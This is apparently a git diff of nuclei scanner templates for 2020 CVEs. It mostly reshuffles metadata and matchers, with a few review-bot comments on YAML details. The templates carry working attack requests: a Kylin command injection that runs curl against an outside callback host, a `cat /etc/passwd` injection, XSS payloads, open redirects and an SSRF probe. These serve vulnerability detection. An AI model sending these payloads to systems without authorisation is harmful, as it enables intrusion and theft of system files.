CWE-601 - cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* epss-score: 0.00138 - tags: cve,cve2020,redirect,zblogphp,authenticated + cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: zblogcn + product: z-blogphp + tags: cve,cve2020,redirect,zblogphp,authenticated http: - raw: 
@@ -30,7 +32,6 @@ http: Connection: close btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 - - | GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 9c3d861669..d80fd6e69d 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19282 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* - epss-score: 0.00165 - tags: cve,cve2020,jeesns,xss + epss-score: 0.00135 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 590bb56ae8..a0918ee82b 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19283 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* - epss-score: 0.00165 - tags: cve,cve2020,jeesns,xss + epss-score: 0.00135 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 09e4453812..44c946d382 100644 --- a/http/cves/2020/CVE-2020-19295.yaml 
+++ b/http/cves/2020/CVE-2020-19295.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19295 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* epss-score: 0.00116 - tags: cve,cve2020,jeesns,xss + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index a6db8934c1..ea54afe274 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -14,11 +14,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-19360 - cpe: cpe:2.3:a:fhem:fhem:*:*:*:*:*:*:*:* + cwe-id: CWE-22 epss-score: 0.08443 - tags: fhem,lfi,cve,cve2020 + cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fhem + product: fhem + tags: fhem,lfi,cve,cve2020 http: - method: GET diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 1c9c3448ee..20fafdd20d 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -16,11 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 + epss-score: 0.9737 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* - epss-score: 0.97275 - tags: cve,cve2020,apache,xss,ofbiz metadata: max-request: 1 + vendor: apache + product: ofbiz + tags: cve,cve2020,apache,xss,ofbiz http: - method: GET @@ -30,14 +32,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: 
diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index ea298337d2..e81e531373 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -11,14 +11,18 @@ info: - http://qdpm.net/download-qdpm-free-project-management - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-19515 cwe-id: CWE-79 + epss-score: 0.00102 + cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:762074255 verified: true + vendor: qdpm + product: qdpm tags: cve,cve2020,xss,qdpm,unauth http: diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index eef5f49fdf..c1fae974e4 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -11,19 +11,21 @@ info: - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706 - https://nvd.nist.gov/vuln/detail/CVE-2020-1956 - http://www.openwall.com/lists/oss-security/2020/07/14/1 + - https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-1956 cwe-id: CWE-78 - epss-score: 0.97262 + epss-score: 0.97423 cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: http.favicon.hash:-186961397 + vendor: apache + product: kylin tags: cve,cve2020,apache,kylin,rce,oast,kev - variables: username: "{{username}}:" password: "{{password}}" 
@@ -34,13 +36,13 @@ http: POST /kylin/api/user/authentication HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64('{{username}}:' + '{{password}}')}} - - | POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 1214096c30..61d67b1613 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -14,11 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-19625 - cpe: cpe:2.3:a:gridx_project:gridx:*:*:*:*:*:*:*:* - epss-score: 0.87952 - tags: cve,cve2020,gridx,rce + epss-score: 0.88684 + cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gridx_project + product: gridx + tags: cve,cve2020,gridx,rce http: - method: GET @@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index d45a67f227..523d314086 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -14,12 +14,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 - cpe: cpe:2.3:a:zzcms:zzcms:*:*:*:*:*:*:*:* epss-score: 0.0009 + cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: zzcms verified: true + vendor: zzcms + product: zzcms tags: cve,cve2020,zzcms,xss http: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 81f4372e39..2155967033 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml 
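Review bot: In the CVE-2020-1956 hunk the header `Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}` appends a colon to `{{username}}`, yet the `variables` block in the preceding hunk already defines `username: "{{username}}:"` with a trailing colon; if that variable shadows the CLI-supplied value the encoded credential becomes `user::pass` and the login never succeeds, and the template only works if nuclei resolves the inner `{{username}}` before the variable is applied — worth confirming with a live run. Whichever way it resolves, one of the two colons is redundant: keep either `username: "{{username}}"` or `base64('{{username}}' + '{{password}}')`, not both. The second raw request and the matchers that `matchers-condition: and` now governs are unchanged by this.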
@@ -14,12 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-20300 cwe-id: CWE-89 - cpe: cpe:2.3:a:weiphp:weiphp:*:*:*:*:*:*:*:* - epss-score: 0.14786 + epss-score: 0.26416 + cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"WeiPHP5.0" verified: true + vendor: weiphp + product: weiphp tags: weiphp,sql http: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index cacd95d0cf..a9e00a1871 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -15,11 +15,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-2036 cwe-id: CWE-79 + epss-score: 0.0109 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* - epss-score: 0.01561 - tags: cve,cve2020,vpn,xss metadata: max-request: 2 + vendor: paloaltonetworks + product: pan-os + tags: cve,cve2020,vpn,xss http: - method: GET @@ -28,18 +30,19 @@ http: - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" stop-at-first-match: true + matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index dfe7c1c0c8..7735a620c9 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2096 cwe-id: CWE-79 - cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:*:*:* - epss-score: 0.97056 + epss-score: 0.96767 + cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 shodan-query: http.title:"GitLab" + framework: jenkins + vendor: jenkins + product: gitlab_hook tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020 http: 
@@ -29,10 +32,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -42,3 +41,7 @@ http: part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 0a7055ffa7..2a5a53c87f 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -13,11 +13,13 @@ info: cvss-score: 9.6 cve-id: CVE-2020-20982 cwe-id: CWE-79 - cpe: cpe:2.3:a:wdja:wdja_cms:*:*:*:*:*:*:*:* - epss-score: 0.01606 + epss-score: 0.03503 + cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: wdja + product: wdja_cms tags: cve,cve2020,xss,wdja,shadoweb http: @@ -26,12 +28,13 @@ http: - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true + matchers-condition: and matchers: - type: word - condition: and words: - "location.href='" + condition: and - type: word part: header diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 8226405aa0..b3a3d7e1b8 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -14,11 +14,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20988 cwe-id: CWE-79 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-score: 0.0009 + cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: domainmod + product: domainmod tags: cve,cve2020,domainmod,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index 34802bdf5a..f82503a729 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml 
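Review bot: In the CVE-2020-20982 hunk at `@@ -26,12 +28,13 @@`, the first word matcher keeps `condition: and` after the reorder, but it lists a single entry (`location.href='`), so the condition has nothing to combine and the moved line `condition: and` under `words:` can be dropped. The newly added `matchers-condition: and` is what actually ties this matcher to the header matcher that follows, so nothing is lost by removing it. The matchers list continues past the end of the hunk, so the remaining entries were not reviewed here.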
@@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:*:*:*:*:*:*:*:* - epss-score: 0.02586 + epss-score: 0.10567 + cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: hotel_and_lodge_booking_management_system_project + product: hotel_and_lodge_booking_management_system tags: cve,cve2020,hotel,sqli,unauth http: diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index e295a94ad8..7a2ae707b1 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -10,16 +10,19 @@ info: - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - http://www.openwall.com/lists/oss-security/2020/01/29/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 + - https://access.redhat.com/errata/RHBA-2020:0402 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-2103 cwe-id: CWE-200 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* - epss-score: 0.00535 + epss-score: 0.00534 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:81586312 + vendor: jenkins + product: jenkins tags: cve,cve2020,jenkins http: @@ -27,26 +30,22 @@ http: - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} - - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} cookie-reuse: true req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - 'text/html' - 'x-jenkins' - condition: and case-insensitive: true + condition: and - type: word part: body_2 @@ -55,6 +54,10 @@ http: - 'SessionId: null' condition: and + - type: status + status: + - 200 + extractors: - type: kval kval: 
diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index ae3ce7b63c..14905869fb 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -14,30 +14,32 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 - cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:* - epss-score: 0.02686 - tags: cve,cve2020,clusterengine,rce + epss-score: 0.03 + cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: inspur + product: clusterengine + tags: cve,cve2020,clusterengine,rce http: - method: POST path: - "{{BaseURL}}/login" - headers: - Content-Type: application/x-www-form-urlencoded - Referer: "{{Hostname}}/module/login/login.html" body: | op=login&username=;`cat /etc/passwd`&password= + headers: + Content-Type: application/x-www-form-urlencoded + Referer: "{{Hostname}}/module/login/login.html" + matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index da1cfbcd1e..2c3fad490f 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2140 cwe-id: CWE-79 - cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:*:*:* - epss-score: 0.00155 - tags: cve,cve2020,jenkins,xss,plugin + epss-score: 0.00208 + cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 + framework: jenkins + vendor: jenkins + product: audit_trail + tags: cve,cve2020,jenkins,xss,plugin http: - method: GET @@ -30,14 +33,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: -

    sample - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 6cac106b1d..512a4ab04f 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -12,16 +12,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22208 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index c5f1ab72c3..6e20c473fa 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -12,16 +12,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22209 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 13603148ca..4a847b0444 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml 
@@ -14,14 +14,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 25618d9dd0..6900bf5e8f 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -12,16 +12,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22211 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" + vendor: 74cms + product: 74cms tags: cve,cve2020,74cms,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index 8e56f3926d..6f01ab0006 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-22840 cwe-id: CWE-601 + epss-score: 0.01174 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* - epss-score: 0.00649 - tags: packetstorm,edb,cve,cve2020,redirect,b2evolution metadata: max-request: 1 + vendor: b2evolution + product: b2evolution + tags: packetstorm,edb,cve,cve2020,redirect,b2evolution http: - method: GET @@ -28,6 +30,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 209e43f67f..d6a269c18b 100644 
--- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -13,15 +13,16 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23015 cwe-id: CWE-601 - cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* epss-score: 0.00228 - tags: cve,cve2020,redirect,opnsense + cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opnsense + product: opnsense + tags: cve,cve2020,redirect,opnsense http: - method: GET - path: - '{{BaseURL}}/?url=http://interact.sh' diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index c126f169e3..d1d3e3a122 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -13,13 +13,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23517 cwe-id: CWE-79 - cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* epss-score: 0.00118 + cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: title:"HighMail" fofa-query: title="HighMail" + vendor: aryanic + product: high_cms tags: cve,cve2020,xss,cms,highmail,aryanic http: @@ -29,17 +31,17 @@ http: - "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - 'value="">' - type: word + part: header words: - text/html - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index f9444ce951..5e0a65693e 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -14,10 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23575 cwe-id: CWE-22 - epss-score: 0.02655 - tags: cve,cve2020,printer,iot,lfi,edb + epss-score: 0.01879 + cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kyocera + product: d-copia253mf_plus_firmware + tags: cve,cve2020,printer,iot,lfi,edb http: - method: GET 
diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 2052315d04..01d7972e96 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -14,13 +14,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-23697 cwe-id: CWE-79 - cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* epss-score: 0.0009 + cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: max-request: 4 verified: true + vendor: monstra + product: monstra_cms tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated - variables: string: "{{to_lower('{{randstr}}')}}" @@ -32,19 +33,16 @@ http: Content-Type: application/x-www-form-urlencoded login={{username}}&password={{password}}&login_submit=Log+In - - | GET /admin/index.php?id=pages&action=add_page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /admin/index.php?id=pages&action=add_page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15 - - | GET /{{string}} HTTP/1.1 Host: {{Hostname}} @@ -61,8 +59,8 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true + part: body diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 4b6ab473ab..bdc8f54ca1 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml 
@@ -17,11 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 - cpe: cpe:2.3:a:gmapfp:gmapfp:*:*:*:*:*:*:*:* - epss-score: 0.66354 - tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive + epss-score: 0.68335 + cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 + framework: joomla\! + vendor: gmapfp + product: gmapfp + tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive http: - raw: @@ -56,6 +59,6 @@ http: extractors: - type: regex - part: body regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" + part: body diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 9cd7d4a7ac..29ace0f6d3 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -15,16 +15,20 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24148 cwe-id: CWE-918 - cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:*:*:* epss-score: 0.06154 - tags: cve,cve2020,wordpress,wp-plugin,ssrf + cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: mooveagency + product: import_xml_and_rss_feeds + tags: cve,cve2020,wordpress,wp-plugin,ssrf http: - method: POST path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml" + body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0" matchers: - type: word diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 607e7c0494..0da13314fd 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml 
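Review bot: In the CVE-2020-23972 info hunk, `framework: joomla\!` carries the CPE 2.3 backslash escape of `!` into a free-form metadata field, so the plain scalar's value is literally `joomla\!` (YAML does not process backslashes in plain scalars). The other templates in this commit write the bare target_sw name for this key (`framework: wordpress`, `framework: jenkins`, `framework: node.js`, `framework: asp.net`), so the consistent value here is `framework: joomla`. The `cpe:` line itself should stay as written, since the escape is required by the CPE formatted-string binding; only the metadata copy needs the change.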
